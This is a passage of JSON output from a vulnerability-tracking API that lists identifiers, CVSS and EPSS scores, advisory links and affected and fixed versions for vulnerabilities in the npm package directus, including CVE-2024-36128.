wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.1"}],"aliases":["GHSA-q83v-hq3j-4pq3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yutw-33sk-5fg3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/257013?format=json","vulnerability_id":"VCID-yz34-qwam-wbcn","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128","reference_id":"","reference_type":"","scores":[{"value":"0.00353","scoring_system":"epss","scoring_elements":"0.57894","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-36128"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128","reference_id":"CVE-2024-36128","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/
C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-36128"},{"reference_url":"https://github.com/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-632p-p495-25m5"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5","reference_id":"GHSA-632p-p495-25m5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/81614?format=json","purl":"pkg:npm/directus@10.11.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3kmj-b584-9ubg"},{"vulnerability":"VCID-4wtt-tffj-bbeb"},{"vulnerability":"VCID-5qx9-76s2-6qfw"},{"vulnerability":"VCID-5u8r-s8tz-guhm"},{"vulnerability":"VCID-7fzh-j76t-5kd3"},{"vulnerability":"VCID-7mea-hn69-wuhu"},{"vulnerability":"VCID-7zt3-dcnm-hqfb"},{"vulnerability":"VCID-anfb-6kfn-a7h7"},{"vulnerability":"VCID-axx3-a6te-d3cw"},{"vulnerability":"VCID-bh2g-b9dd-d3d9"},{"vulnerability":"VCID-g34r-4mb9-afab"},{"vulnerability":"VCID-gwwu-p9jt-eke3"},{"vulnerability":"VCID-hed8-anm5-ukc9"},{"vulnerability":"VCID-hhwc-1jxe-7yaw"},{"vulnerability":"VCID-hpbn-rr29-2yck"},{"vulnerability":"VCID-jjth-fmsp-rfcj"},{"vulnerability":"VCID-kqs7-8txh-jyc8"},{"vulnerability":"VCID-m3wb-sstx-v3d6"},{"vulnerability":"VCID-m5ng-dsfx-6qev"},{"vulnerability":"VCID-mp8
2-hx9n-dufy"},{"vulnerability":"VCID-msb5-197k-a3er"},{"vulnerability":"VCID-na3v-me78-aqcg"},{"vulnerability":"VCID-nvha-b5tb-dqdt"},{"vulnerability":"VCID-p1m5-v3rs-wbh7"},{"vulnerability":"VCID-prpm-x77m-cuha"},{"vulnerability":"VCID-pwt9-krmn-7kdd"},{"vulnerability":"VCID-tt5x-yjzf-4yab"},{"vulnerability":"VCID-ukzv-q5tj-4faq"},{"vulnerability":"VCID-wgag-36wa-qyay"},{"vulnerability":"VCID-wn2j-dtpz-hye1"},{"vulnerability":"VCID-xc7t-gwaz-ckeu"},{"vulnerability":"VCID-xt9c-32g5-mqes"},{"vulnerability":"VCID-xtcw-1jv1-s7ax"},{"vulnerability":"VCID-y1vf-15p4-rfca"},{"vulnerability":"VCID-yutw-33sk-5fg3"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2"}],"aliases":["CVE-2024-36128","GHSA-632p-p495-25m5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yz34-qwam-wbcn"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.0.0-rc.39"}